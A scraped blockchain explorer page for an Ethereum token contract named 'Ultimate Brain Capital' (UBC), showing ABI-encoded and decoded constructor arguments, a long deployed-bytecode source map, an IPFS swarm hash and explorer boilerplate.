c0347bbdf0970457e6b6464736f6c63430008070033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000e8d4a510000000000000000000000000000000000000000000000000000000000000000016556c74696d61746520427261696e204361706974616c0000000000000000000000000000000000000000000000000000000000000000000000000000000000035542430000000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : _name (string): Ultimate Brain Capital
Arg [1] : _symbol (string): UBC
Arg [2] : _supply (uint256): 1000000000000
-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : 000000000000000000000000000000000000000000000000000000e8d4a51000
Arg [3] : 0000000000000000000000000000000000000000000000000000000000000016
Arg [4] : 556c74696d61746520427261696e204361706974616c00000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000003
Arg [6] : 5542430000000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
5128:8414:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6455:18;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2690:64;;;;;;;;;;-1:-1:-1;2690:64:0;;2744:7;1842:51:1;;1830:2;1815:18;2690:64:0;1696:203:1;8392:254:0;;;;;;;;;;-1:-1:-1;8392:254:0;;;;;:::i;:::-;;:::i;:::-;;;2069:14:1;;2062:22;2044:41;;2032:2;2017:18;8392:254:0;1904:187:1;6779:117:0;;;;;;;;;;;;;:::i;:::-;;;4749:25:1;;;4737:2;4722:18;6779:117:0;4603:177:1;9508:416:0;;;;;;;;;;-1:-1:-1;9508:416:0;;;;;:::i;:::-;;:::i;6478:21::-;;;;;;;;;;-1:-1:-1;6478:21:0;;;;;;;;;;;4957:4:1;4945:17;;;4927:36;;4915:2;4900:18;6478:21:0;4785:184:1;12688:208:0;;;;;;;;;;-1:-1:-1;12688:208:0;;;;;:::i;:::-;;:::i;6900:123::-;;;;;;;;;;-1:-1:-1;6900:123:0;;;;;:::i;:::-;-1:-1:-1;;;;;6997:20:0;6969:12;6997:20;;;:8;:20;;;;;;;6900:123;7150:290;;;;;;;;;;-1:-1:-1;7150:290:0;;;;;:::i;:::-;;:::i;6400:20::-;;;;;;;;;;;;;:::i;12902:218::-;;;;;;;;;;-1:-1:-1;12902:218:0;;;;;:::i;:::-;;:::i;7445:299::-;;;;;;;;;;-1:-1:-1;7445:299:0;;;;;:::i;:::-;;:::i;10078:150::-;;;;;;;;;;-1:-1:-1;10078:150:0;;;;;:::i;:::-;-1:-1:-1;;;;;10194:19:0;;;10164:14;10194:19;;;:7;:19;;;;;;;;:28;;;;;;;;;;;;;10078:150;6455:18;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;8392:254::-;8493:10;8464:12;8485:19;;;:7;:19;;;;;;;;-1:-1:-1;;;;;8485:28:0;;;;;;;;;:37;;;8547:8;;8464:12;;8547:8;;8533:22;8529:44;;;8557:16;8566:6;8557:8;:16::i;:::-;8585:37;;4749:25:1;;;-1:-1:-1;;;;;8585:37:0;;;8594:10;;8585:37;;4737:2:1;4722:18;8585:37:0;;;;;;;;-1:-1:-1;8636:4:0;8392:254;;;;;:::o;6779:117::-;6832:4;6869:20;;;:8;:20;;;;6852:12;;:38;;:16;:38::i;:::-;6845:45;;6779:117;:::o;9508:416::-;9594:12;-1:-1:-1;;;;;9618:18:0;;;;;;:40;;-1:-1:-1;9640:4:0;;;;;-1:-1:-1;;;;;9640:4:0;:18;9618:40;9615:82;;;9660:4;:9;;-1:-1:-1;;;;;;9660:9:0;;-1:-1:-1;;;;;9660:9:0;;;;;;9615:82;;;9681:16;9688:4;9694:2;9681:5;:16::i;:::-;-1:-1:-1;;;;;9718:14:0;;;;;;:8;:14;;;;;;:26;;9737:6;9718:18;:26::i;:::-;-1:-1:-1;;;;;9701:14:0;;;;;;:8;:14;;;;;;;;:43;;;;9779:7;:13;;;;;9793:10;9779:25;;;;;;:37;;9809:6;9779:29;:37::i;:::-;-1:-1:-1;;;;;9751:13:0;;;;;;;:7;:13;;;;;;;;9765:10;9751:25;;;;;;;:65;;;;9838:12;;;;;:8;:12;;;;;:24;;9855:6;9838:16;:24::i;:::-;-1:-1:-1;;;;;9823:12:0;;;;;;;:8;:12;;;;;;;:39;;;;9874:26;;;;;;;;;;9893:6;4749:25:1;;4737:2;4722:18;;4603:177;9874:26:0;;;;;;;;-1:-1:-1;9914:4:0;9508:416;;;;;:::o;12688:208::-;12802:10;12776:4;12823:19;;;:7;:19;;;;;;;;-1:-1:-1;;;;;12823:28:0;;;;;;;;;;12776:4;;12793:75;;12814:7;;12823:44;;12856:10;12823:32;:44::i;:::-;12793:8;:75::i;:::-;-1:-1:-1;12886:4:0;12688:208;;;;:::o;7150:290::-;5099:5;;-1:-1:-1;;;;;5099:5:0;5085:10;:19;5077:28;;;;;;-1:-1:-1;;;;;7232:22:0;::::1;7224:68;;;::::0;-1:-1:-1;;;7224:68:0;;3643:2:1;7224:68:0::1;::::0;::::1;3625:21:1::0;3682:2;3662:18;;;3655:30;3721:34;3701:18;;;3694:62;-1:-1:-1;;;3772:18:1;;;3765:31;3813:19;;7224:68:0::1;;;;;;;;;7300:28;7311:8;7321:6;7300:9;:28::i;:::-;-1:-1:-1::0;;;;;7357:18:0;::::1;;::::0;;;:8:::1;:18;::::0;;;;;:30:::1;::::0;7380:6;7357:22:::1;:30::i;:::-;-1:-1:-1::0;;;;;7336:18:0;::::1;;::::0;;;:8:::1;:18;::::0;;;;:51;7410:12:::1;::::0;:24:::1;::::0;7427:6;7410:16:::1;:24::i;:::-;7395:12;:39:::0;-1:-1:-1;;7150:290:0:o;6400:20::-;;;;;;;:::i;12902:218::-;13021:10;12995:4;13042:19;;;:7;:19;;;;;;;;-1:-1:-1;;;;;13042:28:0;;;;;;;;;;12995:4;;13012:80;;13033:7;;13042:49;;13075:15;13042:32;:49::i;7445:299::-;7548:4;;7513:12;;-1:-1:-1;;;;;7542:10:0;;;7548:4;;;;;7542:10;;7534:34;;;;-1:-1:-1;;;7534:34:0;;2900:2:1;7534:34:0;;;2882:21:1;2939:2;2919:18;;;2912:30;-1:-1:-1;;;2958:18:1;;;2951:41;3009:18;;7534:34:0;2698:335:1;7534:34:0;7607:10;7598:20;;;;:8;:20;;;;;;:32;;7623:6;7598:24;:32::i;:::-;7584:10;7575:20;;;;:8;:20;;;;;;:55;;;;-1:-1:-1;;;;;7652:12:0;;;;;;:24;;7669:6;7652:16;:24::i;:::-;-1:-1:-1;;;;;7637:12:0;;;;;;:8;:12;;;;;;;:39;;;;7688:32;;7697:10;;7688:32;;;;7713:6;4749:25:1;;4737:2;4722:18;;4603:177;8921:118:0;8984:11;;;;;;;;;-1:-1:-1;;;;;8984:11:0;-1:-1:-1;;;;;8977:31:0;;:33;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;8969:5;:41;;-1:-1:-1;;;;;;8969:41:0;-1:-1:-1;;;;;8969:41:0;;;;;;;;;;9018:6;:15;8921:118::o;706:104::-;758:6;786:1;781;:6;;773:15;;;;;;799:5;803:1;799;:5;:::i;:::-;795:9;706:104;-1:-1:-1;;;706:104:0:o;10758:1265::-;11329:4;;-1:-1:-1;;;;;11322:11:0;;;11329:4;;;;;11322:11;;;:102;;-1:-1:-1;11403:5:0;;-1:-1:-1;;;;;11394:14:0;;;11403:5;;11394:14;:29;;;;-1:-1:-1;11419:4:0;;-1:-1:-1;;;;;11412:11:0;;;11419:4;;;;;11412:11;11394:29;11322:210;;;-1:-1:-1;11498:4:0;;-1:-1:-1;;;;;11491:11:0;;;11498:4;;;;;11491:11;:40;;;;-1:-1:-1;11525:6:0;;-1:-1:-1;;;;;11506:15:0;;;;;;:8;:15;;;;;;:25;;11491:40;11314:262;;;;-1:-1:-1;;;11314:262:0;;4045:2:1;11314:262:0;;;4027:21:1;4084:2;4064:18;;;4057:30;4123:28;4103:18;;;4096:56;4169:18;;11314:262:0;3843:350:1;11314:262:0;10758:1265;;:::o;324:104::-;376:6;395:5;399:1;395;:5;:::i;:::-;391:9;;420:1;415;:6;;407:15;;;;;13124:332;-1:-1:-1;;;;;13215:20:0;;13207:69;;;;-1:-1:-1;;;13207:69:0;;4400:2:1;13207:69:0;;;4382:21:1;4439:2;4419:18;;;4412:30;4478:34;4458:18;;;4451:62;-1:-1:-1;;;4529:18:1;;;4522:34;4573:19;;13207:69:0;4198:400:1;13207:69:0;-1:-1:-1;;;;;13295:21:0;;13287:68;;;;-1:-1:-1;;;13287:68:0;;3240:2:1;13287:68:0;;;3222:21:1;3279:2;3259:18;;;3252:30;3318:34;3298:18;;;3291:62;-1:-1:-1;;;3369:18:1;;;3362:32;3411:19;;13287:68:0;3038:398:1;13287:68:0;-1:-1:-1;;;;;13368:15:0;;;;;;;:7;:15;;;;;;;;:24;;;;;;;;;;;;;:33;;;13417;;4749:25:1;;;13417:33:0;;4722:18:1;13417:33:0;;;;;;;13124:332;;;:::o;10232:522::-;10625:5;:16;;-1:-1:-1;;;;;;10625:16:0;-1:-1:-1;;;;;10625:16:0;;;;;10660:27;10677:9;:7;10685:1;10677:9;:::i;:::-;10660:12;;;:16;:27::i;:::-;10645:12;:42;10715:33;10738:9;:7;10746:1;10738:9;:::i;:::-;-1:-1:-1;;;;;10715:18:0;;;;;;:8;:18;;;;;;;:22;:33::i;:::-;-1:-1:-1;;;;;10694:18:0;;;;;;;:8;:18;;;;;:54;;;;-1:-1:-1;10232:522:0:o;14:247:1:-;73:6;126:2;114:9;105:7;101:23;97:32;94:52;;;142:1;139;132:12;94:52;181:9;168:23;200:31;225:5;200:31;:::i;266:251::-;336:6;389:2;377:9;368:7;364:23;360:32;357:52;;;405:1;402;395:12;357:52;437:9;431:16;456:31;481:5;456:31;:::i;522:388::-;590:6;598;651:2;639:9;630:7;626:23;622:32;619:52;;;667:1;664;657:12;619:52;706:9;693:23;725:31;750:5;725:31;:::i;:::-;775:5;-1:-1:-1;832:2:1;817:18;;804:32;845:33;804:32;845:33;:::i;:::-;897:7;887:17;;;522:388;;;;;:::o;915:456::-;992:6;1000;1008;1061:2;1049:9;1040:7;1036:23;1032:32;1029:52;;;1077:1;1074;1067:12;1029:52;1116:9;1103:23;1135:31;1160:5;1135:31;:::i;:::-;1185:5;-1:-1:-1;1242:2:1;1227:18;;1214:32;1255:33;1214:32;1255:33;:::i;:::-;915:456;;1307:7;;-1:-1:-1;;;1361:2:1;1346:18;;;;1333:32;;915:456::o;1376:315::-;1444:6;1452;1505:2;1493:9;1484:7;1480:23;1476:32;1473:52;;;1521:1;1518;1511:12;1473:52;1560:9;1547:23;1579:31;1604:5;1579:31;:::i;:::-;1629:5;1681:2;1666:18;;;;1653:32;;-1:-1:-1;;;1376:315:1:o;2096:597::-;2208:4;2237:2;2266;2255:9;2248:21;2298:6;2292:13;2341:6;2336:2;2325:9;2321:18;2314:34;2366:1;2376:140;2390:6;2387:1;2384:13;2376:140;;;2485:14;;;2481:23;;2475:30;2451:17;;;2470:2;2447:26;2440:66;2405:10;;2376:140;;;2534:6;2531:1;2528:13;2525:91;;;2604:1;2599:2;2590:6;2579:9;2575:22;2571:31;2564:42;2525:91;-1:-1:-1;2677:2:1;2656:15;-1:-1:-1;;2652:29:1;2637:45;;;;2684:2;2633:54;;2096:597;-1:-1:-1;;;2096:597:1:o;4974:128::-;5014:3;5045:1;5041:6;5038:1;5035:13;5032:39;;;5051:18;;:::i;:::-;-1:-1:-1;5087:9:1;;4974:128::o;5107:168::-;5147:7;5213:1;5209;5205:6;5201:14;5198:1;5195:21;5190:1;5183:9;5176:17;5172:45;5169:71;;;5220:18;;:::i;:::-;-1:-1:-1;5260:9:1;;5107:168::o;5280:125::-;5320:4;5348:1;5345;5342:8;5339:34;;;5353:18;;:::i;:::-;-1:-1:-1;5390:9:1;;5280:125::o;5410:380::-;5489:1;5485:12;;;;5532;;;5553:61;;5607:4;5599:6;5595:17;5585:27;;5553:61;5660:2;5652:6;5649:14;5629:18;5626:38;5623:161;;;5706:10;5701:3;5697:20;5694:1;5687:31;5741:4;5738:1;5731:15;5769:4;5766:1;5759:15;5623:161;;5410:380;;;:::o;5795:127::-;5856:10;5851:3;5847:20;5844:1;5837:31;5887:4;5884:1;5877:15;5911:4;5908:1;5901:15;5927:131;-1:-1:-1;;;;;6002:31:1;;5992:42;;5982:70;;6048:1;6045;6038:12;5982:70;5927:131;:::o
Swarm Source
ipfs://1628f7276a9f45e80c20c47f6d7f9747b898431824dc0347bbdf0970457e6b64
Loading...
Loading
Loading...
Loading
Net Worth in USD
$0.00
Net Worth in ETH
0
Multichain Portfolio | 33 Chains
| Chain | Token | Portfolio % | Price | Amount | Value |
|---|
Loading...
Loading
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.